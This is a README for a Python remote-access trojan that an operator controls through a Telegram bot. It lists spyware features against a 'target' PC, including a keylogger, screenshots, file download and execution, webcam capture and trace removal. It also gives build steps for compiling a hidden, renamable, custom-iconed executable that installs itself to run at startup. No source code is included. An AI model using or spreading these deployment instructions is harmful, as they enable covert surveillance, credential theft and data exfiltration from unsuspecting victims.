RAT-via-Telegram – Windows Remote Administration Tool via Telegram
Why another one?
The current Remote Administration Tools in the market face 2 major problems:
- Lack of encryption.
- Require port forwarding in order to control from hundreds of miles.
This RAT overcomes both these issues by using the Telegram bot API.
- Fully encrypted. The data being exchanged cannot be spied upon using MITM tools.
- Telegram messenger app provides a simple way to communicate to the target without configuring port forward before hand on the target.
- Run keylogger on the target PC.
- Get target PC’s Windows version, processor and more.
- Get target PC’s IP address information and approximate location on map.
- Show message box with custom text on target PC (Thanks mvrozanti!)
- List any directories on the target.
- Download any file locally from the target PC in the background.
- Upload local files on to the target PC. Send your image, pdf, exe or anything as
fileto the Telegram bot.
- Screenshots of the target PC.
- Execute any file on the target PC.
- [WIP] Self-Destruct RAT on the target PC.
- [WIP] Take snapshots from the webcam (if attached).
- [WIP] Copy and Move files on the target PC.
- [WIP] Delete files on the target PC.
- More coming soon!
- Clone this repository.
- Set up a new Telegram bot talking to the
- Copy this token and replace it in the beginning of the script.
- Install the dependencies:
pip install -r requirements.txt.
- Install pyHook
32-bitdepending on your system.
- For 64-bit-
pip install pyHook-1.5.1-cp27-cp27m-win_amd64.whl.
- For 32-bit-
pip install pyHook-1.5.1-cp27-cp27m-win32.whl.
- For 64-bit-
- To run the script:
- Find your bot on telegram and send some command to the bot to test it.
- To restrict the bot so that it responds only to you, note down your
chat_idfrom the console and replace it in the script and comment out the line
return True. Don’t worry, you’ll know when you read the comments in the script.
– A folder named `RATAttack` will be created in your working directory containing `keylogs.txt` and any files you upload to the bot.
When using the below commands; use
/ as a prefix. For example:
pc_info - PC information msg_box - display message box with text snapshot - take picture with webcam ip_info - via ipinfo.io download_file - download file from target list_dir - list contents of directory run_file - run a file on target capture_pc - screenshot PC keylogs - get keylogs self_destruct - destroy all traces from target PC
You can copy the above to update your command list via
BotFather so you don’t have to type them manually.
- Go to
C:Python27Scriptsor wherever you installed python.
pyinstaller --onefile --noconsole C:pathtoRATAttack.py. You can also pass
--icon=<pathtoicon.ico>to use any custom icon.
- Once it is compiled successfully, find the
C:Python27Scriptsdist. You can change the name of the
.exeto anything you wish.
- BEWARE! If you run the compiled
.exe, the script will hide itself and infect your PC to run at startup. You can return to normal by using the
/self_destructoption or manually removing
C:UsersUsernameAppDataRoamingMicrosoftWindowsStart MenuProgramsStartupportal.lnk(although I recommend removing them manually for the time being).
- You can also modify the name of hidden
.exefile and location & name of the folder where the hidden
.exewill hide itself. To do this; modify
- Currently only Python2 is supported. Python3 support will be added soon!
- Keylogger may detect some keys improperly. Like pressing
shift+/results in recording